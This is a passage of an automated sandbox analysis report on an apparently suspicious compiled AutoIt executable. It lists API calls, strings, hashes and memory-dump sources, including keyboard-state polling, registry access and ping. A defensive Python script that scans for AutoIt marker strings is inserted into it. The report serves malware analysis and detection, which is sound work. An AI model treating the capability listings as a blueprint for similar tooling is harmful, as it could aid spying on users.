                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                          • String ID:
                                                                          • API String ID: 3840717409-0
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit
                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                          • API String ID: 2610073882-3931177956
                                                                          Similarity
                                                                          • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                          • String ID: aut
                                                                          • API String ID: 130057722-3010740371
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                          • String ID: tooltips_class32
                                                                          • API String ID: 2443926738-1918224756
                                                                          Similarity
                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                          • String ID:
                                                                          • API String ID: 2598888154-3916222277
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 2706829360-2785691316
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7ADC9FD7B), ref: 00007FF7ADCA1143
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                          • API String ID: 3964851224-909552448
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                          • String ID: *.*
                                                                          • API String ID: 4125642244-438819550
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                          • String ID: P
                                                                          • API String ID: 1460738036-3110715001
                                                                          Similarity
                                                                          • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 1974058525-0
                                                                          • Opcode ID: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                                          • Instruction ID: 821cdde644a4ce51b9773cb4e8b478116de72152303b943768f72f8f5ab3b826
                                                                          • Opcode Fuzzy Hash: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                                          • Instruction Fuzzy Hash: 3E915021A1F70289EB54AF5598546B8E364FF88F84FDA4135D94E87275EF3CE842D320
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                          • Instruction ID: 823044aad8dbef7bf52e1bf3b89c3edb27314d8b92026a30c4c53d1c857e2432
                                                                          • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                          • Instruction Fuzzy Hash: 3761A172B192508FE714DF69E44466DB7A2F788B84F908139DE1993F58EF3CD9068B00
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                          • Instruction ID: bd98bab5a2e48640591b6054fe88175ef14ed40ef7580becb4e8c6dc124daf71
                                                                          • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                          • Instruction Fuzzy Hash: 9C71DC1261E2C14EFB75AB3094102B9AB61EF45B88FDA0039D68D037E1EE5DD947CB71
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerTypewcscpy
                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          • API String ID: 1561581874-1000479233
                                                                          • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                          • Instruction ID: d9932ce49f3f02a965a1d48dccd8676e95d94522a600de966fbcf25653ce18e4
                                                                          • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                          • Instruction Fuzzy Hash: BFD1F322E0E69649EA20BB25D4406BDE3A2FB54B95FC24231D95D437B4FF3CE9478320
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                          • String ID: %s%u
                                                                          • API String ID: 1412819556-679674701
                                                                          • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                          • Instruction ID: 209a1c6b566f824c6c05211e8da860540615324ebd177d0a1ec77fe35c9261a4
                                                                          • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                          • Instruction Fuzzy Hash: 76B1D472B1E6829BEB19EB25D8046F9A7A0FB44B84FC10031DA19477A5EF3DE516CB10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                          • API String ID: 3030280669-22481851
                                                                          • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                          • Instruction ID: 0c0448803c92e7608d94aa3396f973c6805ce04ea36286637f3cf4ece60d503d
                                                                          • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                          • Instruction Fuzzy Hash: 6B51A52261DA9299EB50EB64E8902EDB7A0FB84784FC14031EA4D47AB9FF3CD547C710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                          • String ID: static
                                                                          • API String ID: 3821898125-2160076837
                                                                          • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                          • Instruction ID: c47c6bfd4ad5885706c4ab8a7c69f0cba39558dabcd613cd4ef434e2f6f8de82
                                                                          • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                          • Instruction Fuzzy Hash: 83418E3261D7818BEB609F25E44475EB3A1FB88B90F904235DA9D47BA8DF3CD846CB10
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                          • String ID:
                                                                          • API String ID: 1255039815-0
                                                                          • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                          • Instruction ID: 457222a7b354fc2f5649f3b73a7073032ac687d9cfa7ab7251a5de784643a2cb
                                                                          • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                          • Instruction Fuzzy Hash: D261E022B196518EEB00EFA1D8405BC7BB4FB44B88BD65035DE4E537A9EF39D846C320
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                          • Instruction ID: 0dde31b065dd6fd6bc7e383f97de8f1843c0493888ac0d2ad237cbb355f6306d
                                                                          • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                          • Instruction Fuzzy Hash: 9641B721E0D2D96FFFB1BB609400379AA91EB19744FCA4039C789031E1EE5DE8968B71
                                                                          APIs
                                                                            • Part of subcall function 00007FF7ADC06838: CreateFileW.KERNELBASE ref: 00007FF7ADC068A2
                                                                            • Part of subcall function 00007FF7ADC24380: GetCurrentDirectoryW.KERNEL32(?,00007FF7ADC0E817), ref: 00007FF7ADC2439C
                                                                            • Part of subcall function 00007FF7ADC056D4: GetFullPathNameW.KERNEL32(?,00007FF7ADC056C1,?,00007FF7ADC07A0C,?,?,?,00007FF7ADC0109E), ref: 00007FF7ADC056FF
                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7ADC0E8B0
                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7ADC0E9FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                          • API String ID: 2207129308-1018226102
                                                                          • Opcode ID: 8c32c7fc769a1785a5cc8aaef85c2c091e9d514911a4bf18a656758b3ba076bf
                                                                          • Instruction ID: 1b6f3f1df0a17bde8c376fc4a066e0f32ad234214e11be3e333eafa78e39498d
                                                                          • Opcode Fuzzy Hash: 8c32c7fc769a1785a5cc8aaef85c2c091e9d514911a4bf18a656758b3ba076bf
                                                                          • Instruction Fuzzy Hash: 8712B422A1E6428AEB10FB65D4411FDE764FB84B44FC24131EA4E476B9EF7CE606C720
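The function above is the AutoIt3 script loader: its string table carries the loader's own markers (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06") next to the parser error messages, which is the evidence behind the "Binary is likely a compiled AutoIt script file" verdict in this report. The check below, an added example and not Joe Sandbox's or the sample's code, scans a file or a raw memory dump (such as the .sdmp files listed above) for those markers in both ASCII and UTF-16LE form and reports their offsets. The marker list, the sample buffer and the helper names are this example's own assumptions; a hit inside the loader's code section only proves an AutoIt runtime is present, while a hit in resource or appended data is where the embedded script body lives, so the offsets matter more than the yes/no answer.

```python
"""Triage check for AutoIt3 marker strings in a file or memory dump.

Added example, not code from the report or the analysed sample. Markers are
the loader strings visible in the report; the sample buffer is constructed.
"""
import re
import sys
from dataclasses import dataclass

# Marker strings taken from the AutoIt3 loader's string table (see report).
# "AU3!" followed by "EA06" is checked as one unit to avoid matching "AU3!"
# on its own, which also appears as a bare parser constant in the runtime.
MARKERS = (
    ("script_marker", b">>>AUTOIT SCRIPT<<<"),
    ("au3_ea06", b"AU3!EA06"),
)


@dataclass(frozen=True)
class AutoItHit:
    marker: str      # name from MARKERS
    encoding: str    # "ascii" or "utf16" (UTF-16LE, as the runtime stores wide strings)
    offset: int      # byte offset of the match in the scanned buffer


def find_autoit_markers(buf: bytes) -> list[AutoItHit]:
    """Return every marker occurrence in buf, sorted by offset."""
    hits: list[AutoItHit] = []
    for name, ascii_needle in MARKERS:
        wide_needle = ascii_needle.decode("ascii").encode("utf-16-le")
        for enc, needle in (("ascii", ascii_needle), ("utf16", wide_needle)):
            for m in re.finditer(re.escape(needle), buf):
                hits.append(AutoItHit(name, enc, m.start()))
    hits.sort(key=lambda h: h.offset)
    return hits


def is_likely_autoit(buf: bytes) -> bool:
    """True when either the script marker or the AU3!EA06 pair is present."""
    return any(h.marker in ("script_marker", "au3_ea06")
               for h in find_autoit_markers(buf))


def summarize(buf: bytes) -> dict[str, int]:
    """Count hits per marker name (a zero count is reported for each marker)."""
    counts = {name: 0 for name, _ in MARKERS}
    for h in find_autoit_markers(buf):
        counts[h.marker] += 1
    return counts


# Constructed sample (assumption, not data from the report): a fake PE-like
# blob with a UTF-16LE script marker at offset 32 and an ASCII AU3!EA06 at 78.
SAMPLE = (
    b"MZ" + b"\x00" * 30
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le")
    + b"\x00" * 8
    + b"AU3!EA06" + b"\x00" * 16
)


def scan_file(path: str) -> list[AutoItHit]:
    """Scan a file on disk (PE, .sdmp memory dump, or any blob)."""
    with open(path, "rb") as fh:
        return find_autoit_markers(fh.read())


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for hit in find_autoit_markers(data):
        print(f"{hit.offset:#010x}  {hit.marker:14s} {hit.encoding}")
    print("likely AutoIt:", is_likely_autoit(data))
```

Run it against the process-15 memory dumps listed above to see which region (code, resource or appended data) the markers fall in; the verdict alone does not distinguish the interpreter from an embedded script.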
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 636576611-1287834457
                                                                          • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                          • Instruction ID: 19fc4c7536bf3ec1273f57aff315f10a696913f3a2dcd9a6b53c27ac0658417a
                                                                          • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                          • Instruction Fuzzy Hash: 52716122A4DA0689EB14AF26E4401BDA761FB44B98FC65431EE2E477B5FF38D446C360
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                          • String ID: 5$Ping
                                                                          • API String ID: 1486594354-1972892582
                                                                          • Opcode ID: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                                          • Instruction ID: 76fd818a9617d0c7045b989266ac3ac66574ae73465c2488b69b48d338106aee
                                                                          • Opcode Fuzzy Hash: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                                          • Instruction Fuzzy Hash: 37714F62A0E6428AEB20EB55D49037DE7A1FB84B90FD28431EA5D477A1FF7CD5428720
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadMessageModuleStringwprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                          • API String ID: 4007322891-4153970271
                                                                          • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                          • Instruction ID: 37af7d8a05b775f243fe345692a76fde5852fc3d84ed75e1081afb351a05c0ad
                                                                          • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                          • Instruction Fuzzy Hash: EE317431A1EA869ADB10FB11E4456EDA360FF44B84FC24032EA4D436A9EF7CD507CB50
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 2573188126-1403004172
                                                                          • Opcode ID: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                          • Instruction ID: 41ac8c40dfa39d48b7c744e7b192d9bb1ee66377e48c7451d70e7d3cf6f46993
                                                                          • Opcode Fuzzy Hash: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                          • Instruction Fuzzy Hash: A931C425B0EA818AEB10BB21E9541B9A361FF88BD0FC54231DA9D037A5EE2CD506C760
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 2573188126-1403004172
                                                                          • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                          • Instruction ID: 5813a63a8eacf22cfc12f57b62b6b4c56204e084dd444c8d3e43f4277d6b0cd9
                                                                          • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                          • Instruction Fuzzy Hash: F131A835B0E68185EB10BB11E9141B9A361FF89BE0FC54331DAAD477E5EE3CD5068760
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          • API String ID: 2479661705-3771769585
